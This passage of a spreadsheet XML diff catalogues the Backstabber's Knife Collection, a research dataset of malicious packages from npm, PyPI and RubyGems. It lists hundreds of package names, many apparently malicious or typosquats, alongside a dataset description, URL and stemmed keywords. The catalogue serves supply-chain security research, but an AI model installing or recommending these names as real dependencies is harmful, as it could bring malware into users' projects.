azureservicebussamplesjs azureservicebussamplests azurestorageblob azurestorageblobchangefeed azurestorageblobchangefeedsamplesjs azurestorageblobchangefeedsamplests azurestorageblobsamplesjs azurestorageblobsamplests azurestoragefiledatalake azurestoragefiledatalakesamplesjs azurestoragefileshare azurestoragefilesharesamplesjs azurestoragefilesharesamplests azurestoragemd5wrapper azurestoragequeue azurestoragequeuesamplesjs azurestoragequeuesamplests azurestoragerequestwrapper azuresynapse azuresynapseaccesscontrol azuresynapseaccesscontrolsamplests azuretemplate azuretemplatesamplesjs azuretemplatesamplests azurevideoanalyzeredge azurevideoanalyzeredgesamplesjs azurevideoanalyzeredgesamplests azureweb azurewebpubsub azurewebpubsubexpress azurewebpubsubexpresssamplesjs azurewebpubsubexpresssamplests azurewebpubsubsamplesjs azurearctest azureazure azurefilter azurevmtest babelpluginaddjsxattribute babelpluginreplacejsxattributevalue babelpluginsvgdynamictitle babelpluginsvgemdimensions babelplugintransformsvgcomponent babelpresetgeocaching babelpresetslick babelcli bananamodule bankaa bankinthechnical bankinthechnicaltest batchexecute bcoinmongoapi bcoinmongomodels bfshelloworld bfxextjs bfxfacsapi bfxfacsauthgoogle bfxfacsbase bfxfacsbull bfxfacsdbbettersqlite bfxfacsdbmongo bfxfacsdbmysql bfxfacsdbsqlite bfxfacsdeflate bfxfacsgraylog bfxfacsgrc bfxfacsgrcs3 bfxfacsgrcslack bfxfacshttp bfxfacsinterval bfxfacslokue bfxfacslru bfxfacsmonitortx bfxfacsplacesgoogle bfxfacsqout bfxfacsredis bfxfacsredislock bfxfacsscheduler bfxfacssftp bfxfacsstores3 bfxfacsutilshard bfxhffuncdata bfxhfsignals bfxhfstrateyexec bfxhftokenrenewalplugin bfxhfuicore bfxlibserverjs bfxproxygrcjs bfxreport bfxreportelectron bfxreportexpress bfxreportui bfxreportsframework bfxstuffui bfxsvcintegration bfxsvcjs bfxutiljs bfxutilnetjs bfxwrkapi bfxwrkbase bfxws2apiaudit bfxuilib bip174bigint bitcionjslib bitcoinjslibbigint bitcoisnjlib bitcorepaymentcodes bitcorewebsite bitpaycordovasdk bitpayrestclient bleedingedgecss boogeyman botbait bottomtabs boxgloves browserift bufferfetch bufferpolyfill buildngpackagr buildoptimizer bundleddepspoc businessemailvalidator buymecoffetotellyou cabuckyclient cachebrowserlocalstorage cachecommon cadlautorest cadlazurecore cadlazureresourcemanager cadlplayground cadlproviderhub cadlproviderhubcontroller cadlproviderhubtemplatescontoso cadlsamples callwithsafeiterationclosing cashtranslator chalc channelpostmessage chaosmeshdashboard checkcorrectnessofiteration checktreeshaking checkworkingtree cidetect cirush classofraw clidebuggerui clihermes climicrosoft365 cliplatformandroid cliplatformios cliserverapi clientaccount clientrecommendation cloudlinuxui cloudlinuxuiapp cloudshelltest cmsuicomponents cnscode cnscodes codeossdev codemirror6gettingstarted codemodel collectuncommitted collectupdates collectionstrong collectionweak color20 colorself2 color20 color200 color201 color21 color23 color24 colorajs colorsart colorsbeta colorsdesign colorsdev colorshelp colorshelper colorsnode colorsperson colorspersonaly colors20 colorsexpress colorschemetool colorzinha colourstring colroname comgoogle comgoogleplay comgoogleplaycomon comringcentral commanderjs commender commonsskin communicationchat communicationcommon communicationidentity communicationnetworktraversal communicationphonenumbers communicationshortcodes communicationsignaling communicationsms compatdata compilercli compilergymfrontend componentemiter confidentialledger confidentialledgerrest configarray containerregistry contextbase conventionalchangelog copayshell copaysign copaywebsite copaywhitepaper copyconstructorproperties coreamqp coreasynciteratorpolyfill coreauth coreclient1 coreclientlro coreclientpaging coreclientrest corehttp corehttpcompat corelro corepaging corerestpipeline coretracing corexml correctisregexplogic correctprototypegetter corstypescript corstypescriptclient corstypescriptserver cosmoslanguageservice createcachekeyfunction createfreedazaarcore createiteratorconstructor createnonenumerableproperty createproperty createpropertydescriptor createtile crossenvjs crossenv cspellbundleddicts cspelltypes cspellversionpin d3js dagit dailymotionsdkjs dashboardisolatedwidgetaccessor datetimeutilities datetoisostring datetoprimitive dazaarcardpublisher dazaarcli dazaarguild dazaarpaybase dazaarpayment dazaarpaymentlightning dazaarresolve dazaarrpc dazaarsearchctl dazaarvision deasyncp deduplication defaultcolor defineiterator definewellknownsymbol dependencytesting describeref deskeracli developerhome devicemqtt digitaltwinscore directorylisting discordbadazera discordbadazinho discordcolors discordfix discordlofy discordprotection discordselfv13 discordselfbottools discordselfbotv11 discordselfbotv12 discordselfbotv14 discordselfbotjsv11 discordstunna discordv11 discordv11js discordv12 discordv13 discordvilao discordvilaozada discordjsaployscriptv11 discordjsdiscordselfbotv4 discordjshakai discordjslukyy discordjsrequest discordjsselfbotaploy discordjsselfbotaployed discordjsselfbotaploys discordjsselfbotaployscr discordjsselfbotaployscript discordjsselfbotcloner discordjsselfbotv12 discordjsselfbotv15 discordjsselfbotv32 discordjsselfbotv7 discordjsselfbotvans7 discordjsselfv13 discordjsselfv14 discordcod discorddependency discordijs discordjslofy discordjsselfbotv17 discordjsv14 discordjsv16 discordjsv18 discordselfbotv15 discordselfbotv16 discordsystem disparitycolors divinitycolor divinitycolors dlldocs dnswatcherfrontend documentcreateelement domfetish3 domiterables dontbelikethat dontblowthisoff dontgothereever dontinstallmeiamatest dortmond22 dtdlparser duccomponentscardshell ducfragmentsspinner ducutilsconditionalwrapper dupglob dutymanager dynamicprotojs echartswww eclipsetypescript elasticagent elasticagentlinuxarm elasticagentwindowsarm elasticsearcharmtemplate elasticsearchlogstashreporter elasticsearchlogstashforwarder electorn elmcombine emberpowertimepicker emberviews engagedigitalbottemplatejs engagedigitalsourceservertemplatejs engagevoiceembeddable engineuseragent enginev8version engineioclientv3 engineeringportal entscreenshare enumbugkeys eslintconfigairbnbstandard eslintconfigcadl eslintconfigeslint eslintconfigmollie eslintparser eslintpluginazuresdk eslintplugingrailed eslintpluginjs eslintscope esprime ethers4 eventhubs eventhubstrack1 eventprocessorhost eventstream eventgrid eventhubscheckpointstoreblob eventhubscheckpointstoretable eventstreammarshaller excessivelysafecall exchangeclients expectrn experimentalutils expresscookies extensionbase extraneousdetected extraneousdevdep fabricjs fastrequests fdstest fetchstring ffmepg filedeppoc2 filteroptions filterpackages finastra firebaseextensions firebaseradar firstwithsideeffect fixerror fixregexpwellknownsymbollogic flamevali flatsurfaceshader flatmapstream floatingpointhexparser flowdevtools fluenttheme foever fontscrubber fontawesomecommontypes forcedstringhtmlmethod forcedstringtrimmethod forlander2 fortnitehammer fortnitehammer2 fortnitehammer3 foundationlegacy fourthwithsideeffect freesolidsvgicons freezing froever fsfrontend fsscandir fstromfb fuckyouscanner fuckyouscanner2 fuckyouscanner3 functionbindcontext fuzztownpoland gatsbysite gdnusedotnet generatedoc generateprotocol geocachingexpressaccountmiddleware geocomponents geoheat getbuiltin getiteratormethod getnpmexecopts getpacked getcookies githubjquerywidgets githubrunnerlambdaagentwebhook glintssdk glipchatbotpoly glipintegrationbugsnag glipintegrationgithub glipintegrationtemplatejs glipintegrationtrello globaloptions gopls graphqlfileloader greencolor grenachebrowserhttp grenachefibclient grenachefibserver grenachenodejsexamplefibclient grenachenodejsexamplefibserver grenachenodejsfibclient grenachenodejsfibserver grenachenodejsutp gruntbackbonetypescriptaccessorgenerator gruntradic gruntradical gruntcli gsaptween gymfrontend habitatsim hardhatconfig hardhatmodern hasnpmversion hastutiltobabelast headcache heftconfigfile heisnotwhatyousee heliumconstructor heliumhelios heliumpgbouncer helloboy634 helloscanners4 helloworld123ccwq helperannotate helperannotateaspure helperapierror helperbuffer helperbuilder helperbuilderbinaryassignmentoperatorvisitor helperbuilderreactjsx helperbuilderreactjsxexperimental helpercalldelegate helpercodeframe helpercompilationtargets helpercreateclassfeaturesplugin helpercreateregexpfeaturesplugin helperdefinemap helperdefinepolyfillprovider helperenvironmentvisitor helperexplodeassignableexpression helperfsm helperfunctionname helpergetfunctionarity helperhoistvariables helpermemberexpressiontofunctions helpermodulecontext helpermoduleimports helpermoduletransforms helpernumbers helperoptimisecallexpression helperpluginutils helperregex helperremapasynctogenerator helperreplacesupers helpersimpleaccess helperskiptransparentexpressionwrappers helpersplitexportdeclaration helpervalidatoridentifier helpervalidatoroption helperwasmbytecode helperwasmsection helperwrapfunction hexojs hiddenkeys hiveproxy hl7fhir hl7fhirr4 hondorastestpackage hostreporterrors httpfetchcookies httpproxymiddelware httpproxyjs hubprojectteamwidget hubrss hubrsswidget hulp hwzpgf hypercorebisect hypercorelogs hypercorelogsbenchmark hyperionhistory imadethis iamnotwhatyouthink icv2 icv2plugin icv2pluginclient iddocstelenordigitalcom identitybrowser identitybrowsermanual identitycachepersistence identityvscode idxautotester ie8domdefine ikst inheritifrequired insightwebsite inspectsource installedpackagecontents internalmetadata internalstate internalpkgfordc internalpkgfordcnew iotcardboardjs iotdeviceupdate iotdeviceupdate1 iotdeviceupdaterest iotmodelsrepository isarrayiteratormethod isforced ispropvalid iteratorscore javaandroid javafluent javafluentnamer javapostprocessor javapreprocessor javavanilla jbanimationgenerator jbrpdsplash jekyllforgithubprojects jestcheck jpfdevs jqeury jquerry jqueryairload jqueryjs jquerz jsfhirvalidator jslibskeleton jslibterminalintegration jslibterminalintegrationexample jssdkreleasetools jsdoccomment jsonrefreaders jupyterwidgets jwtauthapp karmacoveragecoffee karmacoveragecoffeeexample kerocineandgas kerocinedeizel kerocinefuel keychainswift keyvaultadmin keyvaultcertificates keyvaultcommon keyvaultkeys keyvaultmockattestation keyvaultsecrets kikuweb klow klown kotlinlangorg krakenapi kubernetestest kustolanguageservice laddertextjs languageservice languageservicenext layuijs leafletgpx leafletopencagesearch leetlog lemonadestand libjsutilcurrencies libjsutilmarshal libjsutilmath libjsutilpromise libjsutilshard libutilerrjs libubx lifeculer linkbins linkmollie linkiswebsite liquidwebwoocommercegdpr loadfromcwdornpm loadnycconfig loadyaml loadyml lodashs logpacked logibootstrap logsymbles lorawandevices lwwoogdpruseroptins mbackdoor magicgithubio maketypedrequest mapsources mapworkspaces mapboxglshaders mariadb mattermostmobile mattermostmobilee2e maybemaliciouspackage mdmockapi mediaserverembed megarepo mendiff mephistoreviewtest merandabarcelona metavulncalculator metricwatcher metrowhatever meupkgdeteste microsoftbonsaivisualizer mimlofycreator minirts mixedrealityauthentication mixedrealityremoterendering mochaintellij modelerfour modlink modulematthy molliepaymentsforwoocommerce mollieshopware momnet monacokusto monent mongose monitoropentelemetryexporter monitorquery monoreposymlinktest moonbeamhistory moonbeammongodb motivscss mrgmessagebroker msalbrowser msalcommon msalnodeextensions mssqlnode mssqljs mumbojumbo22 musicstore muzliextension mxnestedmenu myetherwalletkb myetherwalletkbv5 myhashringimplementation mysqljs mythicconfiguration mythicnotifications myths namefromfolder nativepromiseconstructor nativesymbol nativeweakmap newcontracts newpromisecapability newrelicplugins ngfocusnext nguilibrary nginxbeautifier ngxpica nobloxjsproxy nodecorelibrary nodees6seed nodefabric nodenamshimysql nodeopencv nodeopensl nodeopenssl nodesqlite nodetkinter node16 nodecaffe nodefabric nodeffmpeg nodefreaksolivan nodehound nodemailerjs nodemssql noderequest nodesass nodesqlite nodetest1010 nodetest199 nodexda nosoawesome232 notaregexp nothingjs notsobrilliant npmclidocs npmscriptdemo npmpubman npxnpx nubankcore oai2tooai3 oauthtutorial objectcolor objectdefineproperties objectgetownpropertydescriptor objectgetownpropertynames objectgetownpropertynamesexternal objectgetownpropertysymbols objectkeysinternal objectload objectpropertyisenumerable objectsetprototypeof octaviuspublic octoprintslackbot ofjaaah ofjaaahteste ofjaaahteste2 ofjaaahtwitch onlytestnotinstall openapitoolscommon openapi3 opencvjs opendexdesktop openssljs opentelemetryinstrumentationazuresdk osssitejekylltheme otplease owhamicolor ownkeys packdirectory packagebins packagedepshash pandoradoomsday pandorasucks pargwayisblocked paywithbitpay paypalexpress paywithaffirmtheme peglegheart pensischeduler perfaiformrecognizer perfaimetricsadvisor perfaitextanalytics perfappconfiguration perfcontainerregistry perfcorerestpipeline perfdatatables perfeventhubs perfeventhubstrack1 perfeventgrid perfidentity perfkeyvaultcertificates perfkeyvaultkeys perfkeyvaultsecrets perfmonitorquery perfsearchdocuments perfservicebus perfservicebustrack1 perfstorageblob perfstorageblobtrack1 perfstoragefiledatalake perfstoragefileshare perfstoragefilesharetrack1 perftemplate pernvalids personcolors perulema phantomlambdatemplate pingoneangularsdk pipedriveembeddableengagephone pipedriveembeddableringcentralphonespa pizzapasta pjreporting pkgwithmain pkgwithnestedmain pkgwithrelativemain platformbrowserdynamic platformexpress pluginbugfixv8spreadparametersinoptionalchaining plugincommonjs pluginenterpriserest plugininject pluginjson pluginnoderesolve pluginpaginaterest pluginproposalasyncgeneratorfunctions pluginproposalclassproperties pluginproposalclassstaticblock pluginproposaldecorators pluginproposaldynamicimport pluginproposalexportdefaultfrom pluginproposalexportnamespacefrom pluginproposaljsonstrings pluginproposallogicalassignmentoperators pluginproposalnullishcoalescingoperator pluginproposalnumericseparator pluginproposalobjectrestspread pluginproposaloptionalcatchbinding pluginproposaloptionalchaining pluginproposalprivatemethods pluginproposalprivatepropertyinobject pluginproposalunicodepropertyregex pluginreplace pluginrequestlog pluginrestendpointmethods pluginsvgo pluginsyntaxasyncgenerators pluginsyntaxbigint pluginsyntaxclassproperties pluginsyntaxclassstaticblock pluginsyntaxdecorators pluginsyntaxdynamicimport pluginsyntaxexportdefaultfrom pluginsyntaxexportnamespacefrom pluginsyntaxflow pluginsyntaximportmeta pluginsyntaxjsonstrings pluginsyntaxjsx pluginsyntaxlogicalassignmentoperators pluginsyntaxnullishcoalescingoperator pluginsyntaxnumericseparator pluginsyntaxobjectrestspread pluginsyntaxoptionalcatchbinding pluginsyntaxoptionalchaining pluginsyntaxprivatepropertyinobject pluginsyntaxtoplevelawait pluginsyntaxtypescript plugintransformarrowfunctions plugintransformasynctogenerator plugintransformblockscopedfunctions plugintransformblockscoping plugintransformclasses plugintransformcomputedproperties plugintransformdestructuring plugintransformdotallregex plugintransformduplicatekeys plugintransformexponentiationoperator plugintransformflowstriptypes plugintransformforof plugintransformfunctionname plugintransformliterals plugintransformmemberexpressionliterals plugintransformmodulesamd plugintransformmodulessystemjs plugintransformmodulesumd plugintransformnamedcapturinggroupsregex plugintransformnewtarget plugintransformobjectassign plugintransformobjectsuper plugintransformparameters plugintransformpropertyliterals plugintransformreactconstantelements plugintransformreactdisplayname plugintransformreactjsx plugintransformreactjsxdevelopment plugintransformreactjsxself plugintransformreactjsxsource plugintransformreactpureannotations plugintransformregenerator plugintransformreservedwords plugintransformruntime plugintransformshorthandproperties plugintransformspread plugintransformstickyregex plugintransformtypeofsymbol plugintransformtypescript plugintransformunicodeescapes plugintransformunicoderegex pluginjiapi1337 pluginsmonorepo pluginutils plutovslackclient pmcontrols pnpmlocalinstall pnpmfilejs polladdin pollingmod portionfatty12 precodejs prereleaseidfromversion prerequestsxcode presentationalcomponents presetflow presetmodules presettypescript prettierplugincadl proctitle promiseresolve proxyjs pulsetilldone purviewaccount purviewadministration purviewadministrationrest purviewcatalog purviewcatalogrest purviewscanning purviewscanningrest pyramidproportion quantumjobs querygraph radicutil radicjs rangeexport rangeforchrome ratemap rcaddin rcaddindemo rccalendarjhorst rcpostmessage rcqnabot rdocumentationapp rdocumentationworkers reactbootcamp reactdatepickerplus reactdropzone3 reacthackernewsbootcamponev2 reactvismaster reactwindowprovider reactidd readmodulesdir readprojectmanifest realmpostgresadapters redefineall redisv4 redtailembeddableringcentralphone reflectdecorators regenraotr regenrator regexpexec regexpexecabstract regexpflags regressiontest relaycompilerplaygroundtests remapping requesterror requesterbrowserxhr requestercommon requesternodehttp requireobjectcoercible requireports restapispecsscripts restaurantapproval reviewstack revokeuseraccess richdocuments rickrolloninstall riderdebugvisualizer rigpackage rimrafdir rimrafall ringcentralapi ringcentralapisamples ringcentralcommonredirect ringcentralcommunityapp ringcentralembeddable ringcentralembeddablercv ringcentralembeddablercvdemo ringcentralembeddablevoiceapp ringcentraljavascript ringcentraljs ringcentraljswidgets ringcentralmediaplayer ringpopui rocketmqsite rpcwebsocket rrgod runlifecycle runtopologically runtimecorejs3 runtimelimiter rushamazons3buildcacheplugin rushazurestoragebuildcacheplugin rushcommon rushlib rushprettier rushsdk rxpjs sailclothjs sameethinghere101 samplesbootstraptheme samplescorstypescriptclient samplescorstypescriptserver sampleswebworkersjs satoshifirealarm scan4all scopemanager scopelymopubaacebookaudiencenetworkadapters scroool sdfjghlkfjdshlkjdhsfg sdktracebase sdktracenode searchdocuments secureidentityloginmodule seemver selfbotdeveloper selfbotdiv semanticconventions sequelizeorm serotonine320 serverbeat servicebustrack1 servicebusv1 servicebusv7 servicebusv9 setspecies settostringtag settingregistry shadowsock sharedkey sheinbbl sheincomponents shopifykoaapp shopifysupply shrugginglogging sinonjsfaketimers skeletonjstask slackreacjilator slimelegends sloppyarraymethod slushfullstackframework smallsm socketioclientv2 soketio soketjs solc0413 somewhereinbetween sonatype sonulindu soundfish soundfish2 soundfish3 sourcemapconsumer speciesconstructor spectralcore spectralformats spectralfunctions spectralparsers spectralrefresolver spectralrulesetmigrator spectralrulesets spectralruntime speedytscompiler spreakersdkjs springprojects sqlitejs sqliter sqlserver sshwifty sshwiftyui stackdriverpushgateway starscolor starscolors staticwebappscli stautses stickytax storageblobchangefeed storageblobtrack1 storageexample storagefile storagefiledatalake storagefilesharetrack1 storageinternalavro storagequeue streamcollator streamcombine streamofend stresstesttrack2 stringmultibyte stringjslib stripesamplecheckoutwithmultiplelocales svcjscli svgoruby swaggervalidationcommon swatycolor symlinkbinary synapseaccesscontrol synapseaccesscontrol1 synapseaccesscontrolrest synapseartifacts synapsemanagedprivateendpoints synapsemonitoring synapsespark ta123123 teamcitybuildartifacts teamcitybuildartifactswidget teamcityinvestigations teamcityprojectstatus teamcityreact teamcityreactdemo teamcityvscodeextension tensorplow testcredential testmodulea testpublicpackages testrecordernew testsequencer testutilsperf testinglibraryjestdom testinglibraryreact testingrecordernew testmodeler testringbuild textvqa tftoslack thebottomless theremontada12 thisnumbervalue thisisnothelloworld tkinter toabsoluteindex toindexedobject toprimitive tostringtagsupport toolcache topup trafficreport transformgeojson transformmodeldebug transformplotly transformvdom transformvega tringlob tscommandline tsgenapi tsconfigslick tslintshared tslintslick turbinehelper turingui twilionpm twing22 typescriptdomlibgenerator ufxlibhiveoutspec ufxlibwrkstate ufxui ufxuiroot uglyfijs uichallenge ungapurlsearchparams unieap unieapandroid unieapcloud unieapios unieapspring unist unitless universaltoken upholdauthorizationcodeoauth upholdauthorizationcodeoauthsample upholdclientcredentialsoauth upholdclientcredentialsoauthsample upholdpat upholdpatsample upholdtransaction upholdtransactionsample upholdsdk uploaderplugin usesymbolasuid utilbufferfrom utilhexencoding utilramlcodegenerator utilutf8node validateorder vcanalytics venzuelaoil venzuella333 videoanalyzeredge videojswistia vilaotest visitorkeys vitalneatengine vscodenpmscript vuebackbone vuepressthemecloudlinux waferbeacon waferbind wafercaas waferform wafergeolocation waferimage waferlightbox wafertoggle wafflesnextdocsite waffles2presentation walletclitools wasmedit wastprinter webpubsub webpubsubexpress webtypes webworkersjs webworkersts wellknownsymbol wfapn wfscheduler wfstorage whatsnewingoland wmbabelruntime wmjquery wmxpathutils woobetterreviews woocartexpiration woointerestinproducts woosimple wpcalypso wrappedwellknownsymbol writelogfile writeprojectmanifest wwwsite xtermaddonclipboard xtermaddonunicodegraphemes yeomangenrator yinhai yinhaicloud yinhaita3 yinhaita3cloud youtrackactivitieswidget youtrackboardstatuswidget youtrackexportableworkitemswidget youtrackissueslistwidget youtrackpersonaltimetracking youtrackpersonaltimetrackingwidget youtrackreportswidgets zalandotechradar zemen zerofalhasvilao zilliqatestinglibrary zureexplorer zureexplorer2 zureexplorer3 zvulnerabilityscanner packagist hautelookphp</t>
+          <t>Researchers identified 174 malicious software packages that were used in real-world attacks on open source software supply chains, and which were distributed via the popular package repositories npm, PyPI, and RubyGems from November 2015 to November 2019.</t>
         </is>
       </c>
       <c r="D140" t="inlineStr">
         <is>
           <t>https://dasfreak.github.io/Backstabbers-Knife-Collection/</t>
-        </is>
-      </c>
-      <c r="E140" t="inlineStr">
-        <is>
-          <t>['knife', 'collection', 'access', 'shoot', 'email', 'ohmatcsunibonnde', 'titlebackstabber', 'knife', 'collection', 'review', 'open', 'source', 'software', 'supply', 'chain', 'attack', 'conference', 'detection', 'intrusion', 'malware', 'vulnerability', 'assessment', 'similar', 'dataset', 'httpsgithubcomlxyeternalpypimalregistry', 'dataset', 'paper', 'empirical', 'study', 'malicious', 'code', 'pypi', 'ecosystem', 'backstabber', 'knife', 'collection', 'httpsreproduciblebuildsorgdocspublication', 'httpsblogphylumiomaliciouspackagestyposquattingandotherattacksagainstopensourcedependencie', 'httpswwwscytheiolibrarymalwarerisksinopensourcecode', 'httpsgiterscomtpike3softwaresupplychaincompromise', 'httpscseciteventsworkshopecosystemslidesplatepdf', 'httpstalkpythonfmepisodesshow319typosquattingandsupplychainsvulnerabilitie', 'httpszhwikipediaorgwikie4be9be5ba94e993bee694bbe587bb', 'httpswwwboozallencominsightscybertechinsighttohuntingforsoftwaresupplychainthreatshtml', 'httpsblogchainguarddevtamingpythonmalwarescanner', 'httpswwwopensourceforucom202208dataprotectionattheconvergenceofopensourceandzerotrust', 'httpssocketdevbloginsidenodemodule', 'httpswwwdavisriedeldepostssoftwaresabotageinopensourceproject', 'index', 'mavencentral', 'bootsantosbootsanto', 'olxbrgitlabnodesdk', 'pornhubalert', 'aatestkit', 'adal', 'addposition', 'addtounscopable', 'addonaction', 'advancestringindex', 'agentassignment', 'agrifoodfarmingr', 'aianomalydetector', 'aitextanalytic', 'airpal', 'amazingauthrail', 'aninstance', 'anobject', 'anarchy', 'angluarcli', 'angularlocationupdate', 'antaniui', 'applicationinsightsdependenciesjs', 'applicationinsightspropertie', 'arduinoideextension', 'arewyoumadatme', 'armadvisor', 'armanalysisservice', 'armapimanagement', 'armappconfiguration', 'armappplatform', 'armappservice', 'armcdn', 'armchangeanalysis', 'armcommerce', 'armcompute', 'armconfluent', 'armconsumption', 'armdatafactory', 'armdatalakeanalytic', 'armdatamigration', 'armdesktopvirtualization', 'armdeviceprovisioningservice', 'armfrontdoor', 'armhanaonazure', 'armhybridkubernete', 'armimagebuilder', 'armiotcentral', 'armiothub', 'armkusto', 'armlabservice', 'armloadtestservice', 'armlock', 'armmachinelearningcompute', 'armmachinelearningexperimentation', 'armmachinelearningservice', 'armmanagedapplication', 'armmanagementgroup', 'armmanagementpartner', 'armmediaservice', 'armoep', 'armoperationalinsight', 'armoperation', 'armpolicyinsight', 'armreservation', 'armresource', 'armsearch', 'armsecurity', 'armsecurityinsight', 'armserialconsole', 'armsql', 'armsubscription', 'autocompletecore', 'autorestgot', 'autoresttestserver', 'axiosreplace', 'azureaidocumenttranslator', 'azureaiformrecognizersamplest', 'azureaimetricsadvisorsamplesjs', 'azureaitext', 'azureaitextanalytic', 'azureaitextanalyticsjs', 'azureaitextanalyticssamplesjs', 'azureaitextanalyticssamplest', 'azureaitextanalyticst', 'azureappconfiguration', 'azureappconfigurationsamplest', 'azurecommunicationchat', 'azurecommunicationidentity', 'azurecommunicationidentitysamplesjs', 'azurecommunicationidentitysamplest', 'azurecommunicationnetworktraversal', 'azurecommunicationnetworktraversalsamplesjs', 'azurecommunicationnetworktraversalsamplest', 'azurecommunicationphonenumber', 'azurecommunicationshortcode', 'azurecommunicationshortcodessamplesjs', 'azurecommunicationshortcodessamplest', 'azurecommunicationsm', 'azureconfidential', 'azuredatafactoryutilitie', 'azuredatatablesjs', 'azuredatatablessamplesjs', 'azuredigital', 'azuredigitaltwin', 'azuredigitaltwinscore', 'azuredigitaltwinscorejs', 'azuredigitaltwinscoresamplest', 'azuredigitaltwinscoret', 'azureeventgridsamplesjs', 'azureeventgridsamplest', 'azureeventhubscheckpointstore', 'azureeventhubscheckpointstoreblobsamplesjs', 'azurefilter3', 'azurefunctiont', 'azurefunctionscsharp', 'azureidentity', 'azureidentitysamplesjs', 'azureiotdeviceupdate', 'azureiotmodelsrepository', 'azureiotmodelsrepositorysamplesjs', 'azureiotmodelsrepositorysamplest', 'azureiotuxbaseline', 'azureiotuxfluentcontrol', 'azureiotuxfluentcss', 'azurejsdevtool', 'azurekeyvaultadmin', 'azurekeyvaultadminsamplesjs', 'azurekeyvaultcertificatesjs', 'azurekeyvaultcertificatessamplest', 'azurekeyvaultkeyssamplesjs', 'azurekeyvaultkeyst', 'azuremixedrealityauthenticationsamplesjs', 'azuremixedrealityauthenticationsamplest', 'azuremockhubsamplesjs', 'azuremockhubsamplest', 'azuremonitoropentelemetry', 'azuremonitoropentelemetryexportersamplest', 'azuremonitorquery', 'azuremonitorquerysamplesjs', 'azuremonitorquerysamplest', 'azurepurviewaccount', 'azurepurviewaccountsamplesjs', 'azurepurviewaccountsamplest', 'azurepurviewcatalogsamplest', 'azurepurviewscanningsamplesjs', 'azurepurviewscanningsamplest', 'azureschemaregistrysamplest', 'azuresearchdocumentssamplesjs', 'azuresearchdocumentssamplest', 'azureservicebussamplesjs', 'azureservicebussamplest', 'azurestorageblob', 'azurestorageblobchangefeed', 'azurestorageblobchangefeedsamplesjs', 'azurestorageblobchangefeedsamplest', 'azurestorageblobsamplesjs', 'azurestorageblobsamplest', 'azurestoragefileshare', 'azurestoragefilesharesamplesjs', 'azurestoragemd5wrapp', 'azurestoragequeue', 'azurestoragequeuesamplesjs', 'azurestoragequeuesamplest', 'azurestoragerequestwrapper', 'azurevideoanalyzeredgesamplesjs', 'azurevideoanalyzeredgesamplest', 'azureweb', 'azurefilter', 'azurevmt', 'babelpluginaddjsxattribute', 'babelpluginsvgdynamictitle', 'babelpluginsvgemdimension', 'babelplugintransformsvgcomponent', 'bankinthechnical', 'bankinthechnicalt', 'batchexecute', 'bfxfacsinterval', 'bfxhfsignal', 'cabuckyclient', 'cachebrowserlocalstorage', 'cachecommon', 'cadlautor', 'cadlazurecore', 'cashtranslator', 'chaosmeshdashboard', 'checkcorrectnessofiteration', 'checkworkingtree', 'cidetect', 'cirush', 'classofraw', 'clientaccount', 'clientrecommendation', 'cloudshelltest', 'cmsuicomponent', 'codemodel', 'collectupdate', 'color20', 'colorself2', 'color20', 'color21', 'color24', 'colorzinha', 'communicationidentity', 'communicationphonenumber', 'communicationsm', 'coreclientrest', 'corelro', 'corexml', 'correctisregexplogic', 'correctprototypegetter', 'corstypescript', 'cosmoslanguageservice', 'createcachekeyfunction', 'cspellbundleddict', 'cspelltype', 'datetoprimitive', 'dazaarcardpublisher', 'dazaarpaymentlightning', 'deduplication', 'defaultcolor', 'defineiterator', 'definewellknownsymbol', 'discordbadazera', 'discordcolor', 'discordprotection', 'discordselfv13', 'discordselfbottool', 'discordselfbotv14', 'discordselfbotjsv11', 'discordstunna', 'discordv11', 'discordv12', 'discordv13', 'discordjsaployscriptv11', 'discordjsselfbotv32', 'discordjsselfv14', 'discordjsv16', 'discordjsv18', 'discordselfbotv15', 'disparitycolor', 'ducfragmentsspinner', 'ducutilsconditionalwrapper', 'dupglob', 'elmcombine', 'engagevoiceembeddable', 'engineuseragent', 'engineioclientv3', 'eslintscope', 'eventprocessorhost', 'eventstream', 'eventgrid', 'eventhubscheckpointstoreblob', 'eventhubscheckpointstoretable', 'eventstreammarshaller', 'excessivelysafecall', 'expectrn', 'experimentalutil', 'extensionbase', 'extraneousdevdep', 'fabricjs', 'fastrequest', 'fdst', 'filteroption', 'finastra', 'firebaseextension', 'firebaseradar', 'fixregexpwellknownsymbollogic', 'flamevali', 'flatsurfaceshader', 'flatmapstream', 'flowdevtool', 'fluenttheme', 'foever', 'fontscrubber', 'foundationlegacy', 'fourthwithsideeffect', 'freesolidsvgicon', 'getcookie', 'githubrunnerlambdaagentwebhook', 'grenachenodejsfibclient', 'grenachenodejsfibserver', 'gruntradic', 'gruntradical', 'helloworld123ccwq', 'helperannotate', 'helperannotateaspure', 'helperapierror', 'helperbuffer', 'helpercompilationtarget', 'helpergetfunctionarity', 'helpermemberexpressiontofunction', 'helpermodulecontext', 'helpermoduleimport', 'helperreplacesuper', 'helperskiptransparentexpressionwrapper', 'helpersplitexportdeclaration', 'helpervalidatoridentifi', 'helpervalidatoroption', 'helperwrapfunction', 'hiddenkey', 'hubrsswidget', 'hyperionhistory', 'imadethis', 'iamnotwhatyouthink', 'identitybrowsermanual', 'installedpackagecontent', 'iotcardboardjs', 'iotdeviceupdater', 'iotmodelsrepository', 'jsdoccomment', 'jsonrefreader', 'linkbin', 'mapboxglshader', 'mattermostmobilee2e', 'maybemaliciouspackage', 'mixedrealityauthentication', 'modulematthy', 'monacokusto', 'monent', 'mongose', 'monitoropentelemetryexporter', 'mysqljs', 'mythicconfiguration', 'mythicnotification', 'myth', 'namefromfolder', 'nativepromiseconstructor', 'newpromisecapability', 'newrelicplugin', 'ngfocusnext', 'nginxbeautifier', 'nodecorelibrary', 'nodemssql', 'noderequ', 'nodesass', 'oauthtutorial', 'objectdefinepropertie', 'objectgetownpropertynamesexternal', 'objectgetownpropertysymbol', 'objectkeysinternal', 'objectload', 'objectpropertyisenumerable', 'objectsetprototypeof', 'owhamicolor', 'packdirectory', 'packagebin', 'packagedepshash', 'pandoradoomsday', 'pandorasuck', 'paypalexpress', 'paywithaffirmtheme', 'perfidentity', 'perfkeyvaultkey', 'perfkeyvaultsecret', 'perfsearchdocument', 'perfstoragefiledatalake', 'perfstoragefileshare', 'perfstoragefilesharetrack1', 'perftemplate', 'pernvalid', 'personcolor', 'phantomlambdatemplate', 'pkgwithrelativemain', 'platformbrowserdynamic', 'platformexpress', 'plugincommonj', 'plugininject', 'pluginjson', 'pluginnoderesolve', 'pluginpaginaterest', 'pluginproposalasyncgeneratorfunction', 'pluginproposaldecorator', 'pluginproposaljsonstring', 